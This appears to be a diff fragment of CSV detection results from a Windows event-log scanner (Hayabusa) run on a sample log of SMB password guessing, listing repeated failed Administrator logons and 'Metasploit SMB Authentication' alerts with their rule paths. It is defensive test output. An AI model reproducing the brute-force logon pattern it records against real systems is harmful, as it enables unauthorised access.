+2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7buinUqketmW3Ib6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rs5gYGs6JBf2yV1J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 67hYMvtmbrmv5LHn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gtV42zBnWwRCLfJS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jnaPNm28FvbFfM8L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oCEvKO14gPFHAZIA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iJJyXCm1YOI2uIAS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MNAScx4qMKxCJQdU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BKTHsNA29ZnPHCHQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CjvAb3sjN0PM8my4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wYQ6HuRSMh8DXzMf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SZgejUxgojDE1kR3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2L4yO411OUnkRGWQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O3mGCNGFML75P7w4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6CBslPz31UACz0wR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F4Y8V0wB6unpmFXA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aXSbx81GD6dYgHtv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dWbnppJfJ0Ll9oLW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eoUjizV5iXImPGTe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HHNG9oylnT46IObg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1LUeAisNPQULjD2t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2sB5MlRw4Ox1OWdN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3WaklWtKd8QByH8M  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nzvyy6CUk43SVxZW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xeolvnD92qP1dJPO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KDvRwPbu6yQH2pEf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vxKdofXKKkCLn2n6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IkO9p50Q9iFolbmb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p01SZCA784xmPMe2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XKaI3FHBbBXvVsES  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmUk6sW8QreDIZZ5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k0w9SSWaaTX7chM9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 46vgsyX5Wxn2rupf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PV8628a8GNKoFyzM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mksBFEFzkC08dB4o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U6QlHT6Bp63JDehd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tRj4fxcRY0Esegl6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dj6zQjZwGEBo0zNt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: imfY1T2VMoaqDSUd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qvPP8UYn9fLpRYl4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rFTGQ5tzNI5k58cK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F8Zj3g1WiTLx8OlJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x2Lr6j8Qt4xEmZZF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BeDRsguCovO47lKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KqrDyaFTewMPSzD9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
